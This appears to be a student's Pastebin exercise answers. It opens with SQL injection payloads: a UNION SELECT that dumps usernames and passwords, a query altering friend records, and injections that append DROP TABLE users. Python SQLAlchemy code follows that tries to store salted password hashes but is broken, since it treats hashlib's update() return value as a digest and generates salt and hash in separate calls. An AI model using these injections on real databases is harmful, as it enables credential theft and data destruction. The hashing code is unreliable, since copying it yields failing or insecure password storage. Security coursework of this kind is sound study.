Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- --Write an attack which will list all the usernames and their passwords.
- UNION SELECT username, password FROM users
- --Write an attack which will update the table so that every entry in the friends table has their userid set to 42.
- SELECT name, phone, age FROM friends
- WHERE friendid = " + id + ";" OR friendid = 42;
- --Write an attack which will drop both tables.
- SELECT userid FROM users
- WHERE username='" + uname + "' AND password='" + passwd + "'; DROP TABLE users;
- SELECT name, phone, age FROM friends
- WHERE friendid = " + id + ";"; DROP TABLE users
- import hashlib
- from os import urandom
- from sqlalchemy import create_engine
- from sqlalchemy.ext.declarative import declarative_base
- from sqlalchemy import Column, Integer, String, VARCHAR
- engine = create_engine('sqlite:///:memory:', echo=False) #change to true
- Base = declarative_base()
- class User_Details(Base):
- '''
- Store the user details in the database.
- Do not store the password in the database.
- **Instead** store the cryptographic hash of the password.
- Make sure that the password is salted, and that the salt is unique for each user.
- '''
- __tablename__ = 'user_details'
- id = Column(Integer, primary_key=True)
- username = Column(VARCHAR)
- hashed_password = Column(VARCHAR)
- salt = Column(VARCHAR)
- #password = hashlib.new('inputastring')
- h = hashlib.new('ripemd160')
- print(h)
- def secure_password(string):
- #has the password using a cryptographic hash function.
- sha = hashlib.sha256()
- psswrd = sha.update(string)
- salt = urandom(len(psswrd))
- password = sha.update(psswrd+salt)
- return password, salt
- from sqlalchemy.orm import sessionmaker
- Session = sessionmaker(bind=engine)
- Session.configure(bind=engine)
- session = Session()
- session.add(User_Details(username="nh123", hashed_password=secure_password("password")[0],
- salt = secure_password("password")[1]))
Add Comment
Please, Sign In to add comment
